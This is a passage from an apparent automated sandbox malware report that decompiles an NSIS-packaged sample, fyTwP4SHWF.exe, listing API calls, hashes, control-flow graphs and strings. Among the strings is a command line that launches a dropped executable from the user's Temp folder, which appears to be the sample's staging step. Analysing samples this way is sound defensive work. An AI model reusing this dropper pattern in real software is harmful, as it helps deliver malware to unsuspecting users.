                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                      • IsWindowEnabled.USER32(00000000), ref: 004041B3
                      • GetDlgItem.USER32 ref: 0040425E
                      • GetDlgItem.USER32 ref: 00404268
                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                      • GetDlgItem.USER32 ref: 00404379
                      • ShowWindow.USER32(00000000,?), ref: 0040439A
                      • EnableWindow.USER32(?,?), ref: 004043AC
                      • EnableWindow.USER32(?,?), ref: 004043C7
                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                      • EnableMenuItem.USER32 ref: 004043E4
                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                      • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                      • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                      • ShowWindow.USER32(?,0000000A), ref: 00404581
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                      • String ID: H7B
                      • API String ID: 2475350683-2300413410
                      • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                      • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                      • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                      • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 260 403d9d-403dc6 call 403fed call 40603f 251->260 256 403d92-403d98 lstrcatW 252->256 257 403d7c-403d8d call 406536 252->257 256->260 257->256 266 403e58-403e60 call 40603f 260->266 267 403dcc-403dd1 260->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 268 403dd7-403dff call 406536 267->268 268->266 277 403e01-403e05 268->277 273->274 275 403f14-403f1c call 40140b 274->275 276 403e95-403ec5 RegisterClassW 274->276 290 403f26-403f31 call 403fed 275->290 291 403f1e-403f21 275->291 279 403fe3 276->279 280 403ecb-403f0f SystemParametersInfoW CreateWindowExW 276->280 282 403e17-403e23 lstrlenW 277->282 283 403e07-403e14 call 405f64 277->283 288 403fe5-403fec 279->288 280->275 284 403e25-403e33 lstrcmpiW 282->284 285 403e4b-403e53 call 405f37 call 406668 282->285 283->282 284->285 289 403e35-403e3f GetFileAttributesW 284->289 285->266 294 403e41-403e43 289->294 295 403e45-403e46 call 405f83 289->295 301 403f37-403f51 ShowWindow call 4069c5 290->301 302 403fba-403fc2 call 40579d 290->302 291->288 294->285 294->295 295->285 309 403f53-403f58 call 4069c5 301->309 310 403f5d-403f6f GetClassInfoW 301->310 307 403fc4-403fca 302->307 308 403fdc-403fde call 40140b 302->308 307->291 311 403fd0-403fd7 call 40140b 307->311 308->279 309->310 314 403f71-403f81 GetClassInfoW RegisterClassW 310->314 315 403f87-403faa DialogBoxParamW call 40140b 310->315 311->291 314->315 318 403faf-403fb8 call 403c67 315->318 318->288
                      C-Code - Quality: 96%
                      			E00403D17(void* __eflags) {
                      				intOrPtr _v4;
                      				intOrPtr _v8;
                      				int _v12;
                      				void _v16;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t22;
                      				void* _t30;
                      				void* _t32;
                      				int _t33;
                      				void* _t36;
                      				int _t39;
                      				int _t40;
                      				int _t44;
                      				short _t63;
                      				WCHAR* _t65;
                      				signed char _t69;
                      				WCHAR* _t76;
                      				intOrPtr _t82;
                      				WCHAR* _t87;
                      
                      				_t82 =  *0x42a270;
                      				_t22 = E00406A35(2);
                      				_t90 = _t22;
                      				if(_t22 == 0) {
                      					_t76 = 0x423748;
                      					L"1033" = 0x30;
                      					 *0x437002 = 0x78;
                      					 *0x437004 = 0;
                      					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                      					__eflags =  *0x423748;
                      					if(__eflags == 0) {
                      						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                      					}
                      					lstrcatW(L"1033", _t76);
                      				} else {
                      					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                      				}
                      				E00403FED(_t78, _t90);
                      				_t86 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
                      				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                      				 *0x42a2fc = 0x10000;
                      				if(E0040603F(_t90, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
                      					L16:
                      					if(E0040603F(_t98, _t86) == 0) {
                      						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                      					}
                      					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                      					 *0x429248 = _t30;
                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                      						L21:
                      						if(E0040140B(0) == 0) {
                      							_t32 = E00403FED(_t78, __eflags);
                      							__eflags =  *0x42a300;
                      							if( *0x42a300 != 0) {
                      								_t33 = E0040579D(_t32, 0);
                      								__eflags = _t33;
                      								if(_t33 == 0) {
                      									E0040140B(1);
                      									goto L33;
                      								}
                      								__eflags =  *0x42922c;
                      								if( *0x42922c == 0) {
                      									E0040140B(2);
                      								}
                      								goto L22;
                      							}
                      							ShowWindow( *0x423728, 5); // executed
                      							_t39 = E004069C5("RichEd20"); // executed
                      							__eflags = _t39;
                      							if(_t39 == 0) {
                      								E004069C5("RichEd32");
                      							}
                      							_t87 = L"RichEdit20W";
                      							_t40 = GetClassInfoW(0, _t87, 0x429200);
                      							__eflags = _t40;
                      							if(_t40 == 0) {
                      								GetClassInfoW(0, L"RichEdit", 0x429200);
                      								 *0x429224 = _t87;
                      								RegisterClassW(0x429200);
                      							}
                      							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                      							E00403C67(E0040140B(5), 1);
                      							return _t44;
                      						}
                      						L22:
                      						_t36 = 2;
                      						return _t36;
                      					} else {
                      						_t78 =  *0x42a260;
                      						 *0x429204 = E00401000;
                      						 *0x429210 =  *0x42a260;
                      						 *0x429214 = _t30;
                      						 *0x429224 = 0x40a3b4;
                      						if(RegisterClassW(0x429200) == 0) {
                      							L33:
                      							__eflags = 0;
                      							return 0;
                      						}
                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                      						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                      						goto L21;
                      					}
                      				} else {
                      					_t78 =  *(_t82 + 0x48);
                      					_t92 = _t78;
                      					if(_t78 == 0) {
                      						goto L16;
                      					}
                      					_t76 = 0x428200;
                      					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                      					_t63 =  *0x428200; // 0x22
                      					if(_t63 == 0) {
                      						goto L16;
                      					}
                      					if(_t63 == 0x22) {
                      						_t76 = 0x428202;
                      						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                      					}
                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                      						L15:
                      						E00406668(_t86, E00405F37(_t76));
                      						goto L16;
                      					} else {
                      						_t69 = GetFileAttributesW(_t76);
                      						if(_t69 == 0xffffffff) {
                      							L14:
                      							E00405F83(_t76);
                      							goto L15;
                      						}
                      						_t98 = _t69 & 0x00000010;
                      						if((_t69 & 0x00000010) != 0) {
                      							goto L15;
                      						}
                      						goto L14;
                      					}
                      				}
                      			}
























                      0x00403d1d
                      0x00403d26
                      0x00403d2d
                      0x00403d2f
                      0x00403d43
                      0x00403d55
                      0x00403d5e
                      0x00403d67
                      0x00403d6e
                      0x00403d73
                      0x00403d7a
                      0x00403d8d
                      0x00403d8d
                      0x00403d98
                      0x00403d31
                      0x00403d3c
                      0x00403d3c
                      0x00403d9d
                      0x00403da7
                      0x00403db0
                      0x00403db5
                      0x00403dc6
                      0x00403e58
                      0x00403e60
                      0x00403e69
                      0x00403e69
                      0x00403e7f
                      0x00403e85
                      0x00403e93
                      0x00403f14
                      0x00403f1c
                      0x00403f26
                      0x00403f2b
                      0x00403f31
                      0x00403fbb
                      0x00403fc0
                      0x00403fc2
                      0x00403fde
                      0x00000000
                      0x00403fde
                      0x00403fc4
                      0x00403fca
                      0x00403fd2
                      0x00403fd2
                      0x00000000
                      0x00403fca
                      0x00403f3f
                      0x00403f4a
                      0x00403f4f
                      0x00403f51
                      0x00403f58
                      0x00403f58
                      0x00403f63
                      0x00403f6b
                      0x00403f6d
                      0x00403f6f
                      0x00403f78
                      0x00403f7b
                      0x00403f81
                      0x00403f81
                      0x00403fa0
                      0x00403fb1
                      0x00000000
                      0x00403fb6
                      0x00403f1e
                      0x00403f20
                      0x00000000
                      0x00403e95
                      0x00403e95
                      0x00403ea1
                      0x00403eab
                      0x00403eb1
                      0x00403eb6
                      0x00403ec5
                      0x00403fe3
                      0x00403fe3
                      0x00000000
                      0x00403fe3
                      0x00403ed4
                      0x00403f0f
                      0x00000000
                      0x00403f0f
                      0x00403dcc
                      0x00403dcc
                      0x00403dcf
                      0x00403dd1
                      0x00000000
                      0x00000000
                      0x00403ddf
                      0x00403df1
                      0x00403df6
                      0x00403dff
                      0x00000000
                      0x00000000
                      0x00403e05
                      0x00403e07
                      0x00403e14
                      0x00403e14
                      0x00403e1d
                      0x00403e23
                      0x00403e4b
                      0x00403e53
                      0x00000000
                      0x00403e35
                      0x00403e36
                      0x00403e3f
                      0x00403e45
                      0x00403e46
                      0x00000000
                      0x00403e46
                      0x00403e41
                      0x00403e43
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e43
                      0x00403e23

                      APIs
                        • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                        • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                      • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                      • lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,?,?,?,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,772EFAA0), ref: 00403E18
                      • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,?,?,?,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                      • GetFileAttributesW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,?,00000000,?), ref: 00403E36
                      • LoadImageW.USER32 ref: 00403E7F
                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                      • RegisterClassW.USER32 ref: 00403EBC
                      • SystemParametersInfoW.USER32 ref: 00403ED4
                      • CreateWindowExW.USER32 ref: 00403F09
                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                      • GetClassInfoW.USER32 ref: 00403F6B
                      • GetClassInfoW.USER32 ref: 00403F78
                      • RegisterClassW.USER32 ref: 00403F81
                      • DialogBoxParamW.USER32 ref: 00403FA0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                      • String ID: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                      • API String ID: 1975747703-694051266
                      • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                      • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                      • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                      • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 342 403322-403327 334->342 343 403257-40325a 334->343 337 403163-40317a 335->337 338 40317c 337->338 339 40317e-403187 call 4035e2 337->339 338->339 348 40318d-403194 339->348 349 4032de-4032e6 call 40302e 339->349 342->327 345 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 343->345 346 40325c-403274 call 4035f8 call 4035e2 343->346 373 4032d4-4032d9 345->373 374 4032e8-403318 call 4035f8 call 403371 345->374 346->342 368 40327a-403280 346->368 352 403210-403214 348->352 353 403196-4031aa call 406113 348->353 349->342 357 403216-40321d call 40302e 352->357 358 40321e-403224 352->358 353->358 371 4031ac-4031b3 353->371 357->358 364 403233-40323b 358->364 365 403226-403230 call 406b22 358->365 364->337 372 403241 364->372 365->364 368->342 368->345 371->358 376 4031b5-4031bc 371->376 372->334 373->327 382 40331d-403320 374->382 376->358 379 4031be-4031c5 376->379 379->358 381 4031c7-4031ce 379->381 381->358 383 4031d0-4031f0 381->383 382->342 384 403329-40333a 382->384 383->342 385 4031f6-4031fa 383->385 386 403342-403347 384->386 387 40333c 384->387 388 403202-40320a 385->388 389 4031fc-403200 385->389 391 403348-40334e 386->391 387->386 388->358 390 40320c-40320e 388->390 389->372 389->388 390->358 391->391 392 403350-403368 call 406113 391->392 392->327
                      C-Code - Quality: 98%
                      			E004030D0(void* __eflags, signed int _a4) {
                      				DWORD* _v8;
                      				DWORD* _v12;
                      				intOrPtr _v16;
                      				long _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				signed int _v40;
                      				short _v560;
                      				long _t54;
                      				void* _t57;
                      				void* _t62;
                      				intOrPtr _t65;
                      				void* _t68;
                      				intOrPtr* _t70;
                      				long _t82;
                      				signed int _t89;
                      				intOrPtr _t92;
                      				long _t94;
                      				void* _t102;
                      				void* _t106;
                      				long _t107;
                      				long _t110;
                      				void* _t111;
                      
                      				_t94 = 0;
                      				_v8 = 0;
                      				_v12 = 0;
                      				 *0x42a26c = GetTickCount() + 0x3e8;
                      				GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe", 0x400);
                      				_t106 = E00406158(L"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe", 0x80000000, 3);
                      				 *0x40a018 = _t106;
                      				if(_t106 == 0xffffffff) {
                      					return L"Error launching installer";
                      				}
                      				E00406668(L"C:\\Users\\frontdesk\\Desktop", L"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe");
                      				E00406668(0x439000, E00405F83(L"C:\\Users\\frontdesk\\Desktop"));
                      				_t54 = GetFileSize(_t106, 0);
                      				 *0x420f00 = _t54;
                      				_t110 = _t54;
                      				if(_t54 <= 0) {
                      					L24:
                      					E0040302E(1);
                      					if( *0x42a274 == _t94) {
                      						goto L32;
                      					}
                      					if(_v12 == _t94) {
                      						L28:
                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                      						_t111 = _t57;
                      						E00406B90(0x40ce68);
                      						E00406187(0x40ce68,  &_v560, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\"); // executed
                      						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                      						 *0x40a01c = _t62;
                      						if(_t62 != 0xffffffff) {
                      							_t65 = E004035F8( *0x42a274 + 0x1c);
                      							 *0x420f04 = _t65;
                      							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                      							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                      							if(_t68 == _v20) {
                      								 *0x42a270 = _t111;
                      								 *0x42a278 =  *_t111;
                      								if((_v40 & 0x00000001) != 0) {
                      									 *0x42a27c =  *0x42a27c + 1;
                      								}
                      								_t45 = _t111 + 0x44; // 0x44
                      								_t70 = _t45;
                      								_t102 = 8;
                      								do {
                      									_t70 = _t70 - 8;
                      									 *_t70 =  *_t70 + _t111;
                      									_t102 = _t102 - 1;
                      								} while (_t102 != 0);
                      								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                      								E00406113(0x42a280, _t111 + 4, 0x40);
                      								return 0;
                      							}
                      							goto L32;
                      						}
                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                      					}
                      					E004035F8( *0x420ef0);
                      					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                      						goto L32;
                      					} else {
                      						goto L28;
                      					}
                      				} else {
                      					do {
                      						_t107 = _t110;
                      						asm("sbb eax, eax");
                      						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                      						if(_t110 >= _t82) {
                      							_t107 = _t82;
                      						}
                      						if(E004035E2(0x418ef0, _t107) == 0) {
                      							E0040302E(1);
                      							L32:
                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                      						}
                      						if( *0x42a274 != 0) {
                      							if((_a4 & 0x00000002) == 0) {
                      								E0040302E(0);
                      							}
                      							goto L20;
                      						}
                      						E00406113( &_v40, 0x418ef0, 0x1c);
                      						_t89 = _v40;
                      						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                      							_a4 = _a4 | _t89;
                      							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                      							_t92 = _v16;
                      							 *0x42a274 =  *0x420ef0;
                      							if(_t92 > _t110) {
                      								goto L32;
                      							}
                      							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                      								_v12 = _v12 + 1;
                      								_t110 = _t92 - 4;
                      								if(_t107 > _t110) {
                      									_t107 = _t110;
                      								}
                      								goto L20;
                      							} else {
                      								break;
                      							}
                      						}
                      						L20:
                      						if(_t110 <  *0x420f00) {
                      							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                      						}
                      						 *0x420ef0 =  *0x420ef0 + _t107;
                      						_t110 = _t110 - _t107;
                      					} while (_t110 != 0);
                      					_t94 = 0;
                      					goto L24;
                      				}
                      			}




























                      0x004030db
                      0x004030de
                      0x004030e1
                      0x004030fb
                      0x00403100
                      0x00403113
                      0x00403118
                      0x0040311e
                      0x00000000
                      0x00403120
                      0x00403131
                      0x00403142
                      0x00403149
                      0x00403151
                      0x00403156
                      0x00403158
                      0x00403243
                      0x00403245
                      0x00403251
                      0x00000000
                      0x00000000
                      0x0040325a
                      0x00403286
                      0x0040328b
                      0x00403296
                      0x00403298
                      0x004032a9
                      0x004032c4
                      0x004032cd
                      0x004032d2
                      0x004032f1
                      0x00403301
                      0x00403313
                      0x00403318
                      0x00403320
                      0x0040332d
                      0x00403335
                      0x0040333a
                      0x0040333c
                      0x0040333c
                      0x00403344
                      0x00403344
                      0x00403347
                      0x00403348
                      0x00403348
                      0x0040334b
                      0x0040334d
                      0x0040334d
                      0x00403357
                      0x00403363
                      0x00000000
                      0x00403368
                      0x00000000
                      0x00403320
                      0x00000000
                      0x004032d4
                      0x00403262
                      0x00403274
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040315e
                      0x00403163
                      0x00403168
                      0x0040316c
                      0x00403173
                      0x0040317a
                      0x0040317c
                      0x0040317c
                      0x00403187
                      0x004032e0
                      0x00403322
                      0x00000000
                      0x00403322
                      0x00403194
                      0x00403214
                      0x00403218
                      0x0040321d
                      0x00000000
                      0x00403214
                      0x0040319d
                      0x004031a2
                      0x004031aa
                      0x004031d0
                      0x004031df
                      0x004031e5
                      0x004031ea
                      0x004031f0
                      0x00000000
                      0x00000000
                      0x004031fa
                      0x00403202
                      0x00403205
                      0x0040320a
                      0x0040320c
                      0x0040320c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004031fa
                      0x0040321e
                      0x00403224
                      0x00403230
                      0x00403230
                      0x00403233
                      0x00403239
                      0x00403239
                      0x00403241
                      0x00000000
                      0x00403241

                      APIs
                      • GetTickCount.KERNEL32 ref: 004030E4
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fyTwP4SHWF.exe,00000400), ref: 00403100
                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\fyTwP4SHWF.exe,80000000,00000003), ref: 0040615C
                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fyTwP4SHWF.exe,C:\Users\user\Desktop\fyTwP4SHWF.exe,80000000,00000003), ref: 00403149
                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fyTwP4SHWF.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                      • API String ID: 2803837635-3324310071
                      • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                      • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                      • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                      • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                      C-Code - Quality: 77%
                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                      				void* __esi;
                      				void* _t35;
                      				void* _t43;
                      				void* _t45;
                      				FILETIME* _t51;
                      				FILETIME* _t64;
                      				void* _t66;
                      				signed int _t72;
                      				FILETIME* _t73;
                      				FILETIME* _t77;
                      				signed int _t79;
                      				WCHAR* _t81;
                      				void* _t83;
                      				void* _t84;
                      				void* _t86;
                      
                      				_t77 = __ebx;
                      				 *(_t86 - 8) = E00402DA6(0x31);
                      				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                      				_t35 = E00405FAE( *(_t86 - 8));
                      				_push( *(_t86 - 8));
                      				_t81 = L"\"C:\\";
                      				if(_t35 == 0) {
                      					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
                      				} else {
                      					E00406668();
                      				}
                      				E004068EF(_t81);
                      				while(1) {
                      					__eflags =  *(_t86 + 8) - 3;
                      					if( *(_t86 + 8) >= 3) {
                      						_t66 = E0040699E(_t81);
                      						_t79 = 0;
                      						__eflags = _t66 - _t77;
                      						if(_t66 != _t77) {
                      							_t73 = _t66 + 0x14;
                      							__eflags = _t73;
                      							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                      						}
                      						asm("sbb eax, eax");
                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                      						__eflags = _t72;
                      						 *(_t86 + 8) = _t72;
                      					}
                      					__eflags =  *(_t86 + 8) - _t77;
